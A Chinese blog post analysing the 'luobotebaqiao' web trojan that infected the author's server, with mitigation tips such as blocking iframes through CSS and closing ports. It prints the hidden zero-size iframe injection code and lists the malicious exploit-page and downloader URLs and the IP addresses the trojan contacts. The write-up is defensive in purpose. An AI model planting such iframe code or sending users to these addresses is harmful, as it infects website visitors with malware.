400-685-0732

WJMonitor舆情之声

企业大数据智能舆情监测管理解决方案

全网监测海量数据按需发布监测预警

实时把握舆情动态精准追溯信息源头

获取验证码

luobotebaqiao病毒防治临时解决方案

luobotebaqiao病毒防治临时解决方案

rude 暂无评论
SEO知识

前段时间,自己服务器上中了病毒luobotebaqiao,这个挂马者也真是垃圾。地震期间,竟然把知名的公益网站也给挂马。其良心真是大大地坏啊。刚开始的挂马代码是:<iframesrc=http://1.luobotebaqiao.info/index.htmwidth=0height=0></iframe>,<iframesrc=http://2.luobotebaqiao.info/index.htmwidth=0height=0></iframe>而现在的挂马代码是<iframesrc=http://ddd.luobotebaqiao.org/ddddd.htmwidth=0height=0></iframe>看到一个论坛上说的是大名鼎鼎的赛迪网也给它袭击了。我在google搜索的时候,出现这个画面。

  

  中毒现象表现为:用最新的360安全卫士查杀不到,装360的防火墙也无济于事,其他的杀毒软件也都查不出来,但重启主机就暂时又不见了,过一段时间就可能又出现了,周六和周日表现比较频繁;

  以下是我在网上搜集的资料:

  http://ddd.luobotebaqiao.org/ddddd.htm

  http://ddd.luobotebaqiao.org/14.htmMS06014

  http://ddd.luobotebaqiao.org/rl.htmrealone

  http://ddd.luobotebaqiao.org/new.htmrealone11

  http://ddd.luobotebaqiao.org/lz.htm联众0DAY

  http://ddd.luobotebaqiao.org/bf.htm爆风

  http://ddd.luobotebaqiao.org/xl.htm没见到内容.看名字应该是要挂迅雷的

  刚刚下了下,以前的记录.以上几个马.均跟以前:1.luobotebaqiao.info中的网马一样.

  下载者:http://exe.luobotebaqiao.net/w3.exe

  本人刚刚是准备脱壳,再看下这个东西,下的是什么.结果,搞半天.也没搞出来.

  壳脱了,也没看到.本人又不会用OD查看下载地址.准备用嗅探.嗅下子.结果,没的工具.

  所以.就直接运行了它.效果不错.

  直接运行w3.exe后.首先会调用进程:svchost.exe用户名:当前管理员.非SYSTEM

  连接到:222.186.13.200这个地址.

  接着.会连接到60.191.208.235下载N多木马.木马后缀名:msi.

  如果连接失败.比如:本人用IPSEC将这个IP封掉.那么.过几分钟后.

  会连到:60.191.215.126将从这里,下载N多木马.后缀名:MSI.

  这两个下载木马的IP的关系.:先调用60.191.208.235这个服务器.

  如果失败,再调用60.191.215.126如果,两个都失败了.则关闭连接.任意一个成功后,

  比如:第一个成功下载下来木马,完成后关闭连接.不连第二个.

  下载下来的木马,均以msi后缀来运行.

  文件名:_qosec0.msi_qosec2.msi这种类型!

  从_qosec0.msi一直到_qosec34.msi.总共30几个木马.

  木马所在地:C:\DocumentsandSettings\Administrator\LocalSettings\Temp

  如果,你使用了本人的软件策略,那么,你可以在这里看到.30几个木马,外加几十个BAT批处理文件.

  用来删除木马文件的.并且不会中毒.

  解决方法:1:在css代码里屏蔽iframe,我以前写过文章地址:http://www.admin5.com/article/20071129/63757.shtml,你可以写一个网页把css代码写入,然后保存为html文件,在服务器的IIS文档启用文档页脚把刚才的那个页面附加上,这个页面给everyone读取权限。不过用此法的话,会把JS文件屏蔽掉。

  2:关闭服务器上无用的端口(建议保留80端口和远程桌面端口。如果有FTP的话可以打开21端口,根据情况定,不过建议还是临时关闭ftp端口),在服务器的防火墙上只开这三个端口。对于杀毒软件可以设置其能访问网络。

  目前此病毒已经被列入很多杀毒软件厂商的名单,

  此文仅供参考!文章:中国IT技术服务网

文军二维码

推荐阅读

WJMonitor试用

站内搜索